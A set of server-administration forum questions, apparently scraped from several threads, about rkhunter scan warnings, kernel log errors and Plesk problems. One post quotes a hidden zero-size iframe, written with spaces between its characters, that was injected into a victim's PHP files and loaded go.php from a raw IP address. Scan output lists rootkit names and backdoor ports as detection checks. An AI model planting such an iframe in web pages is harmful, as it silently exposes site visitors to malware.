I just ran 'rkhunter -c --quiet' and this is the error messages I got:
Line:
Warning: This operating system is not fully supported!
Line: Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
Some errors has been found while checking. Please perform a manual check on this machine debian
Does anyone know what the following events in /var/log/messages mean. It looks like some sort of failure on the ata bus. Does the last line mean that it successfully wrote all data using the cache, or could there be data loss?
The output of smartctl looks ok for the disk.
Code: Jul 26 16:44:35 server1 kernel: ata1.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen Jul 26 16:44:35 server1 kernel: ata1.00: cmd c8/00:08:9d:e2:8a/00:00:00:00:00/ec tag 0 cdb 0x0 data 4096 in Jul 26 16:44:35 server1 kernel: res 40/00:01:00:4f:c2/00:00:00:00:00/00 Emask 0x4 (timeout) Jul 26 16:44:42 server1 kernel: ata1: port is slow to respond, please be patient (Status 0xd0) Jul 26 16:45:05 server1 kernel: ata1: port failed to respond (30 secs, Status 0xd0) Jul 26 16:45:05 server1 kernel: ata1: soft resetting port Jul 26 16:45:10 server1 kernel: ata1.00: revalidation failed (errno=-2) Jul 26 16:45:10 server1 kernel: ata1: failed to recover some devices, retrying in 5 secs Jul 26 16:45:15 server1 kernel: ata1: soft resetting port Jul 26 16:45:15 server1 kernel: ata1.00: configured for UDMA/133 Jul 26 16:45:15 server1 kernel: ata1: EH complete Jul 26 16:45:15 server1 kernel: SCSI device sda: 976773168 512-byte hdwr sectors (500108 MB) Jul 26 16:45:15 server1 kernel: SCSI device sda: drive cache: write back
Apache seems to have the port blocked. I removed my thumbdrive earlier after using XAMPP on it successfully that had it on it and went somewhere then came back & well all the sudden it will not work. I am getting the below error messages after I push the start button.
I have a Plesk 11.5 server that someone made changes to in IIS to allow web site users to turn the sending of detailed error messages on and off from a web.config file. Unfortunately now none of the sites will send detailed error messages to the browser no matter what is done. The person that made the changes to IIS did not document them properly and cannot tell me what exactly they changed. None of the obvious settings have made an effect on the problem.
Mar 31 14:56:52 hosting plesk sendmail[1177]: _mh_fork(): Error occured during waiting the child process with pid: 1178: No child processes Mar 31 14:56:52 hosting plesk sendmail[1177]: Error during 'check-quota' handler Mar 31 14:56:52 hosting plesk sendmail[1177]: Unable to get sender domain by sender mailname
I have just noticed that for several days I'm constantly receiving these infos in /var/log/messages. I haven't done anything that would invoke them. How can I disable these messages? Are they anything to worry about?
Code: Feb 6 14:28:18 server kernel: [<c014f600>] find_extend_vma+0x12/0x4f Feb 6 14:28:18 server kernel: [<c0134383>] get_futex_key+0x39/0x108 Feb 6 14:28:18 server kernel: [<c011d305>] finish_task_switch+0x30/0x66 Feb 6 14:28:18 server kernel: [<c02cf618>] schedule+0x844/0x87a Feb 6 14:28:18 server kernel: [<c027734b>] sys_socketcall+0x1df/0x1fb Feb 6 14:28:18 server kernel: [<c0125bc5>] sys_gettimeofday+0x53/0xac Feb 6 14:28:18 server kernel: [<c02d137f>] syscall_call+0x7/0xb Feb 6 14:28:18 server kernel: [<c02d007b>] _read_lock_irq+0x4/0x1e Feb 6 14:28:18 server kernel: Badness in dst_release at include/net/dst.h:149 Feb 6 14:28:18 server kernel: [<f8d8a555>] ip6_push_pending_frames+0x340/0x369 [ipv6] Feb 6 14:28:18 server kernel: [<f8d9883f>] udp_v6_push_pending_frames+0x169/0x185 [ipv6]Badness in dst_release at include/net/dst.h:149 Feb 6 14:28:18 server kernel: [<c0278fa8>] Feb 6 14:28:18 server kernel: [<f8d98e7d>] udpv6_sendmsg+0x622/0x770 [ipv6] Feb 6 14:28:18 server kernel: [<c027a498>] __kfree_skb+0x55/0xf7 Feb 6 14:28:18 server kernel: [<c027e1b8>] skb_dequeue+0x40/0x46 Feb 6 14:28:18 server kernel: [<c027b009>] net_tx_action+0x60/0xfc Feb 6 14:28:18 server kernel: [<c0126354>] skb_recv_datagram+0x61/0x9b Feb 6 14:28:18 server kernel: [<c02b1ed7>] __do_softirq+0x4c/0xb1 Feb 6 14:28:18 server kernel: [<c010814b>] do_softirq+0x4f/0x56 Feb 6 14:28:18 server kernel: ======================= Feb 6 14:28:18 server kernel: [<c0107a60>] do_IRQ+0x1a2/0x1ae Feb 6 14:28:18 server kernel: [<c02d1d3c>] udp_recvmsg+0x5f/0x271 Feb 6 14:28:18 server kernel: [<c02b7b35>] common_interrupt+0x18/0x20 Feb 6 14:28:18 server kernel: [<c02d007b>] inet_sendmsg+0x38/0x42 Feb 6 14:28:18 server kernel: [<c02757f5>] _read_lock_irq+0x4/0x1e Feb 6 14:28:18 server kernel: sock_sendmsg+0xdb/0xf7 Feb 6 14:28:18 server kernel: [<c02757f5>] sock_sendmsg+0xdb/0xf7 Feb 6 14:28:18 server kernel: [<c011fee1>] autoremove_wake_function+0x0/0x2d Feb 6 14:28:18 server kernel: [<c027a89e>] verify_iovec+0x76/0xc2 Feb 6 14:28:18 server kernel: [<c0276f44>] sys_sendmsg+0x1ee/0x23b Feb 6 14:28:18 server kernel: [<c011cb7d>] activate_task+0x88/0x95 Feb 6 14:28:18 server kernel: [<c011d00a>] try_to_wake_up+0x225/0x230 Feb 6 14:28:18 server kernel: [<c011d00a>] try_to_wake_up+0x225/0x230 Feb 6 14:28:18 server kernel: [<c0170776>] inode_update_time+0x80/0x87 Feb 6 14:28:18 server kernel: [<c0164748>] pipe_writev+0x310/0x31c Feb 6 14:28:18 server kernel: [<c02cf622>] schedule+0x84e/0x87a Feb 6 14:28:18 server kernel: [<c027734b>] sys_socketcall+0x1df/0x1fb Feb 6 14:28:18 server kernel: [<c0125bc5>] sys_gettimeofday+0x53/0xac Feb 6 14:28:18 server kernel: [<c02d137f>] syscall_call+0x7/0xb Feb 6 14:28:18 server kernel: [<c02d007b>] _read_lock_irq+0x4/0x1e Feb 6 14:28:18 server kernel: Badness in dst_release at include/net/dst.h:149 Feb 6 14:28:18 server kernel: [<f8d98ef7>] udpv6_sendmsg+0x69c/0x770 [ipv6] Feb 6 14:28:18 server kernel: [<c027a498>] skb_dequeue+0x40/0x46 Feb 6 14:28:18 server kernel: [<c027b009>] skb_recv_datagram+0x61/0x9b Feb 6 14:28:18 server kernel: [<c02b1ed7>] udp_recvmsg+0x5f/0x271 Feb 6 14:28:18 server kernel: [<c02b7b35>] inet_sendmsg+0x38/0x42 Feb 6 14:28:18 server kernel: [<c02757f5>] sock_sendmsg+0xdb/0xf7 Feb 6 14:28:18 server kernel: [<c02757f5>] sock_sendmsg+0xdb/0xf7 Feb 6 14:28:18 server kernel: [<c011fee1>] autoremove_wake_function+0x0/0x2d Feb 6 14:28:18 server kernel: [<c027a89e>] verify_iovec+0x76/0xc2 Feb 6 14:28:18 server kernel: [<c0276f44>] sys_sendmsg+0x1ee/0x23b Feb 6 14:28:18 server kernel: [<c011cb7d>] activate_task+0x88/0x95 Feb 6 14:28:18 server kernel: [<c011d00a>] try_to_wake_up+0x225/0x230 Feb 6 14:28:18 server kernel: [<c011d00a>] try_to_wake_up+0x225/0x230 Feb 6 14:28:18 server kernel: [<c0170776>] inode_update_time+0x80/0x87 Feb 6 14:28:18 server kernel: [<c0164748>] pipe_writev+0x310/0x31c Feb 6 14:28:18 server kernel: [<c02cf622>] schedule+0x84e/0x87a Feb 6 14:28:18 server kernel: [<c027734b>] sys_socketcall+0x1df/0x1fb Feb 6 14:28:18 server kernel: [<c0125bc5>] sys_gettimeofday+0x53/0xac Feb 6 14:28:18 server kernel: [<c02d137f>] syscall_call+0x7/0xb Feb 6 14:28:18 server kernel: [<c02d007b>] _read_lock_irq+0x4/0x1e
about my rkhunter`s log. It gives some warnings but i dont know if they are really important ones.
Here are the warnings it gives :
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa Warning: Found enabled xinetd service: /etc/xinetd.d/poppassd_psa Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_psa Warning: Found enabled xinetd service: /etc/xinetd.d/smtps_psa Warning: The SSH configuration option 'PermitRootLogin' has not been set. The default value may be 'yes', to allow root access. Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression Warning: Application 'gpg', version '1.2.6', is out of date, and possibly a security risk. Warning: Application 'openssl', version '0.9.7a', is out of date, and possibly a security risk. Warning: Application 'php', version '4.3.9', is out of date, and possibly a security risk.
I am using plesk and i am using yum update for updating files and scripts. So i dont know how can i update gpg php and openssl. Plus for some time it said like port 2006 is open and possible trojan backdoor. But when i check now it doesnt give any error like that.
if there is any major problem at those logs or not?
if someone also wants i can attach the full rkhunter.log or only warning output rkhunter.log
I've honestly never had to worry about protecting myself from exploits until this week, when I found out somebody agined access t othe server using an old script on an old account (teach me to delete client accounts when they leave me, it did!)
I'm working on a new server and going through lots of posts on better securing it, and two things that are suggested is installing chkrootkit and rkhunter, and adding them to the daily cron jobs. Learned how to install and set up the daily script for chkrootkit, but here's what I'd like to do that I'm not sure how to go about, I'd like to a) be notified ONLY if there are changes in the daily scans (especially since there are a couple of false positives I'm aware of) and b) be e-mailed a full report once a week, whether or not there were any changes.
I've got rkhunter installed as well, but I can't seem to find a script that will properly execute it and e-mail it to me. Does anybody have one that works? I'd also like to only get an e-mail if there are changes, except for a once weekly scan result.
I have run rkhunter and got the following report, I have checked everything and seems to be fine. Also, I have run rkhunter --update and didn't help. How can remove this bad messages? Do I need to reinstall the package?
/bin/dmesg [ BAD ] /bin/env [ BAD ] /bin/grep [ BAD ] /bin/kill [ BAD ] /bin/login [ BAD ]
Code: Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable Same result in two different RHE 4 boxes... just to verify that this is a false positive , do you have the same results in your RHE 4 boxes while running "rkhunter -c" ?
[1;33mChecking rkhunter version... [0;39m This version : 1.3.2 Latest version: 1.3.2 [ Rootkit Hunter version 1.3.2 ]
[1;33mChecking rkhunter data files... [0;39m Checking file mirrors.dat [34C[ [1;32mNo update [0;39m ] Checking file programs_bad.dat [29C[ [1;32mNo update [0;39m ] Checking file backdoorports.dat [28C[ [1;32mNo update [0;39m ] Checking file suspscan.dat [33C[ [1;32mNo update [0;39m ] Checking file i18n/cn [38C[ [1;32mNo update [0;39m ] Checking file i18n/en [38C[ [1;32mNo update [0;39m ] Checking file i18n/zh [38C[ [1;32mNo update [0;39m ] Checking file i18n/zh.utf8 [33C[ [1;32mNo update [0;39m ] Warning: Checking for preload file [ Warning ] Warning: Found library preload file: /etc/ld.so.preload Warning: The file properties have changed: File: /bin/ps Current hash: 36f3d8a9fcaebf5838e5e55ebdcac7e355477343 Stored hash : 8f1acf237e562043f8353f4ec5d0c3490c0d0cb3 Current inode: 1228803 Stored inode: 1228857 Current size: 61364 Stored size: 67088 Current file modification time: 1214487892 Stored file modification time : 1195262225 Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable Warning: The file properties have changed: File: /usr/bin/top Current hash: 15f1f743d73d9546a05a15644816139de7708327 Stored hash : 5e78fb7f0a02643a91964081ca03316dbaf01bdd Current inode: 246165 Stored inode: 245920 Current size: 48536 Stored size: 48504 Current file modification time: 1214487892 Stored file modification time : 1195262225 Warning: The file properties have changed: File: /usr/bin/vmstat Current hash: 898351bc3be226caf6915715b23a1c7cc5d35fdd Stored hash : edaa64f3921a0a2d873c14a5eb641ba883f4dcff Current inode: 246561 Stored inode: 246020 Current size: 17872 Stored size: 20444 Current file modification time: 1214487892 Stored file modification time : 1195262225 Warning: The file properties have changed: File: /usr/bin/w Current hash: 480c2c2e4f1048e19fc075f4daebe79fa84e08d1 Stored hash : 87f39eeb583bc7f6622e95fd0266f093ed8b362b Current inode: 246020 Stored inode: 246167 Current size: 9720 Stored size: 11720 Current file modification time: 1214487892 Stored file modification time : 1195262225 Warning: The file properties have changed: File: /usr/bin/watch Current inode: 246167 Stored inode: 245924 Current file modification time: 1214487892 Stored file modification time : 1195262225 Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable Warning: The file properties have changed: File: /sbin/sysctl Current hash: b560099caf18d28bcc0249efaec75dcddb87b219 Stored hash : fa13202ac5897d9f7198e8afbbe7d0c835b07639 Current inode: 589893 Stored inode: 589875 Current size: 9144 Stored size: 11048 Current file modification time: 1214487892 Stored file modification time : 1195262225
I know some of these warnings like /usr/bin/GET - groups -ldd - whatis - ifdown – ifup are normal false positives.
But other warnings are new,
I think they changed after upgrading the cpanel to 11.23 I have cpanel on centos 4.6
Im not having a much knowledge of server managing well i have a question rkhunter showing after scan that there is two valunable applications he found but im unable to get the name of these files which are valunable how do i know the name of them ?
rkhunter -c output: Default logfile will be used (/var/log/rkhunter.log). Default temporary directory will be used (/usr/local/rkhunter/lib/rkhunter/tmp). Default database directory will be used (/usr/local/rkhunter/lib/rkhunter/db). The internationalisation directory does not exist: /usr/local/rkhunter/lib/rkhunter/db/i18n Centos
I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.
Code: <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> what is the reason and how to fix that ?
and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem : rkhunter results:
Code: Checking system commands...
Performing 'strings' command checks Checking 'strings' command [ OK ]
Performing 'shared libraries' checks Checking for preloading variables [ None found ] Checking for preload file [ Not found ] Checking LD_LIBRARY_PATH variable [ Not found ]
Performing file properties checks Checking for prerequisites [ Warning ] /bin/awk [ OK ] /bin/basename [ OK ] /bin/bash [ OK ] /bin/cat [ OK ] /bin/chmod [ OK ] /bin/chown [ OK ] /bin/cp [ OK ] /bin/csh [ OK ] /bin/cut [ OK ] /bin/date [ OK ] /bin/df [ OK ] /bin/dmesg [ OK ] /bin/echo [ OK ] /bin/ed [ OK ] /bin/egrep [ OK ] /bin/env [ OK ] /bin/fgrep [ OK ] /bin/grep [ OK ] /bin/kill [ OK ] /bin/login [ OK ] /bin/ls [ OK ] /bin/mail [ OK ] /bin/mktemp [ OK ] /bin/more [ OK ] /bin/mount [ OK ] /bin/mv [ OK ] /bin/netstat [ OK ] /bin/passwd [ OK ] /bin/ps [ OK ] /bin/pwd [ OK ] /bin/rpm [ OK ] /bin/sed [ OK ] /bin/sh [ OK ] /bin/sort [ OK ] /bin/su [ OK ] /bin/touch [ OK ] /bin/uname [ OK ] /bin/gawk [ OK ] /bin/tcsh [ OK ] /usr/bin/awk [ OK ] /usr/bin/chattr [ OK ] /usr/bin/curl [ OK ] /usr/bin/cut [ OK ] /usr/bin/diff [ OK ] /usr/bin/dirname [ OK ] /usr/bin/du [ OK ] /usr/bin/env [ OK ] /usr/bin/file [ OK ] /usr/bin/find [ OK ] /usr/bin/GET [ Warning ] /usr/bin/groups [ Warning ] /usr/bin/head [ OK ] /usr/bin/id [ OK ] /usr/bin/kill [ OK ] /usr/bin/killall [ OK ] /usr/bin/last [ OK ] /usr/bin/lastlog [ OK ] /usr/bin/ldd [ Warning ] /usr/bin/less [ OK ] /usr/bin/locate [ OK ] /usr/bin/logger [ OK ] /usr/bin/lsattr [ OK ] /usr/bin/lynx [ OK ] /usr/bin/md5sum [ OK ] /usr/bin/newgrp [ OK ] /usr/bin/passwd [ OK ] /usr/bin/perl [ OK ] /usr/bin/pstree [ OK ] /usr/bin/readlink [ OK ] /usr/bin/runcon [ OK ] /usr/bin/sha1sum [ OK ] /usr/bin/size [ OK ] /usr/bin/slocate [ OK ] /usr/bin/stat [ OK ] /usr/bin/strace [ OK ] /usr/bin/strings [ OK ] /usr/bin/sudo [ OK ] /usr/bin/tail [ OK ] /usr/bin/test [ OK ] /usr/bin/top [ OK ] /usr/bin/tr [ OK ] /usr/bin/uniq [ OK ] /usr/bin/users [ OK ] /usr/bin/vmstat [ OK ] /usr/bin/w [ OK ] /usr/bin/watch [ OK ] /usr/bin/wc [ OK ] /usr/bin/wget [ OK ] /usr/bin/whatis [ Warning ] /usr/bin/whereis [ OK ] /usr/bin/which [ OK ] /usr/bin/who [ OK ] /usr/bin/whoami [ OK ] /usr/bin/gawk [ OK ] /sbin/chkconfig [ OK ] /sbin/depmod [ OK ] /sbin/ifconfig [ OK ] /sbin/ifdown [ Warning ] /sbin/ifup [ Warning ] /sbin/init [ OK ] /sbin/insmod [ OK ] /sbin/ip [ OK ] /sbin/lsmod [ OK ] /sbin/modinfo [ OK ] /sbin/modprobe [ OK ] /sbin/nologin [ OK ] /sbin/rmmod [ OK ] /sbin/runlevel [ OK ] /sbin/sulogin [ OK ] /sbin/sysctl [ OK ] /sbin/syslogd [ OK ] /usr/sbin/adduser [ OK ] /usr/sbin/chroot [ OK ] /usr/sbin/groupadd [ OK ] /usr/sbin/groupdel [ OK ] /usr/sbin/groupmod [ OK ] /usr/sbin/grpck [ OK ] /usr/sbin/kudzu [ OK ] /usr/sbin/lsof [ OK ] /usr/sbin/prelink [ OK ] /usr/sbin/pwck [ OK ] /usr/sbin/tcpd [ OK ] /usr/sbin/useradd [ OK ] /usr/sbin/userdel [ OK ] /usr/sbin/usermod [ OK ] /usr/sbin/vipw [ OK ] /usr/sbin/xinetd [ OK ] /usr/local/bin/perl [ OK ] /usr/local/bin/rkhunter [ OK ]
Checking for rootkits...
Performing check of known rootkit files and directories 55808 Trojan - Variant A [ Not found ] ADM Worm [ Not found ] AjaKit Rootkit [ Not found ] aPa Kit [ Not found ] Apache Worm [ Not found ] Ambient (ark) Rootkit [ Not found ] Balaur Rootkit [ Not found ] BeastKit Rootkit [ Not found ] beX2 Rootkit [ Not found ] BOBKit Rootkit [ Not found ] CiNIK Worm (Slapper.B variant) [ Not found ] Danny-Boy's Abuse Kit [ Not found ] Devil RootKit [ Not found ] Dica-Kit Rootkit [ Not found ] Dreams Rootkit [ Not found ] Duarawkz Rootkit [ Not found ] Enye LKM [ Not found ] Flea Linux Rootkit [ Not found ] FreeBSD Rootkit [ Not found ] ****`it Rootkit [ Not found ] GasKit Rootkit [ Not found ] Heroin LKM [ Not found ] HjC Kit [ Not found ] ignoKit Rootkit [ Not found ] ImperalsS-FBRK Rootkit [ Not found ] Irix Rootkit [ Not found ] Kitko Rootkit [ Not found ] Knark Rootkit [ Not found ] Li0n Worm [ Not found ] Lockit / LJK2 Rootkit [ Not found ] Mood-NT Rootkit [ Not found ] MRK Rootkit [ Not found ] Ni0 Rootkit [ Not found ] Ohhara Rootkit [ Not found ] Optic Kit (Tux) Worm [ Not found ] Oz Rootkit [ Not found ] Phalanx Rootkit [ Not found ] Phalanx Rootkit (strings) [ Not found ] Portacelo Rootkit [ Not found ] R3dstorm Toolkit [ Not found ] RH-Sharpe's Rootkit [ Not found ] RSHA's Rootkit [ Not found ] Scalper Worm [ Not found ] Sebek LKM [ Not found ] Shutdown Rootkit [ Not found ] SHV4 Rootkit [ Not found ] SHV5 Rootkit [ Not found ] Sin Rootkit [ Not found ] Slapper Worm [ Not found ] Sneakin Rootkit [ Not found ] Suckit Rootkit [ Not found ] SunOS Rootkit [ Not found ] SunOS / NSDAP Rootkit [ Not found ] Superkit Rootkit [ Not found ] TBD (Telnet BackDoor) [ Not found ] TeLeKiT Rootkit [ Not found ] T0rn Rootkit [ Not found ] Trojanit Kit [ Not found ] Tuxtendo Rootkit [ Not found ] URK Rootkit [ Not found ] VcKit Rootkit [ Not found ] Volc Rootkit [ Not found ] X-Org SunOS Rootkit [ Not found ] zaRwT.KiT Rootkit [ Not found ]
Performing additional rootkit checks Suckit Rookit additional checks [ OK ] Checking for possible rootkit files and directories [ None found ] Checking for possible rootkit strings [ None found ]
Performing malware checks Checking running processes for suspicious files [ None found ] Checking for login backdoors [ None found ] Checking for suspicious directories [ None found ] Checking for sniffer log files [ None found ]
Performing trojan specific checks Checking for enabled xinetd services [ None found ] Checking for Apache backdoor [ Not found ]
Performing Linux specific checks Checking kernel module commands [ OK ] Checking kernel module names [ OK ] Checking the network...
Performing check for backdoor ports Checking for UDP port 2001 [ Not found ] Checking for TCP port 2006 [ Not found ] Checking for TCP port 2128 [ Not found ] Checking for TCP port 14856 [ Not found ] Checking for TCP port 47107 [ Not found ] Checking for TCP port 60922 [ Not found ]
Performing checks on the network interfaces Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks Checking for local host name [ Found ] Checking for local startup files [ Found ] Checking local startup files for malware [ None found ] Checking system startup files for malware [ None found ]
Performing group and account checks Checking for passwd file [ Found ] Checking for root equivalent (UID 0) accounts [ None found ] Checking for passwordless accounts [ None found ] Checking for passwd file changes [ None found ] Checking for group file changes [ None found ] Checking root account shell history files [ OK ]
Performing system configuration file checks Checking for SSH configuration file [ Found ] Checking if SSH root access is allowed [ Warning ] Checking if SSH protocol v1 is allowed [ Warning ] Checking for running syslog daemon [ Found ] Checking for syslog configuration file [ Found ] Checking if syslog remote logging is allowed [ Not allowed ]
Performing filesystem checks Checking /dev for suspicious file types [ None found ] Checking for hidden files and directories [ Warning ] Checking application versions...
Checking version of Exim MTA [ OK ] Checking version of GnuPG [ Warning ] Checking version of Apache [ Skipped ] Checking version of Bind DNS [ OK ] Checking version of OpenSSL [ Warning ] Checking version of PHP [ OK ] Checking version of Procmail MTA [ OK ] Checking version of OpenSSH [ OK ]
how to fix rkhunter from; 'not found' in local files and unknown for exim and php 5.2.5.
System checks * Allround tests Checking hostname... Found. Hostname is Checking for passwordless user accounts... OK Checking for differences in user accounts... OK. No changes. Checking for differences in user groups... OK. No changes. Checking boot.local/rc.local file... - /etc/rc.local [ OK ] - /etc/rc.d/rc.local [ OK ] - /usr/local/etc/rc.local [ Not found ] - /usr/local/etc/rc.d/rc.local [ Not found ] - /etc/conf.d/local.start [ Not found ] - /etc/init.d/boot.local [ Not found ]
* Application version scan - Exim MTA 4.68 [ Unknown ] - GnuPG 1.2.6 [ Old or patched version ] - Apache [unknown] [ OK ] - Bind DNS 9.2.4 [ OK ] - OpenSSL 0.9.7a [ Old or patched version ] - PHP 5.2.5 [ Unknown ] - PHP 5.2.5 [ Unknown ] - Procmail MTA 3.22 [ OK ] - OpenSSH 3.9p1 [ OK ]
I enabled rkhunter in Plesk 12 to check the system weekly. I get a warning now, which I never got in older versions of Plesk:
The current hash function (/usr/bin/sha1sum) or package manager (DPKG) is incompatible with the hash function (Unset) or package manager (Unset) used to store the values. Debian 7.6 x64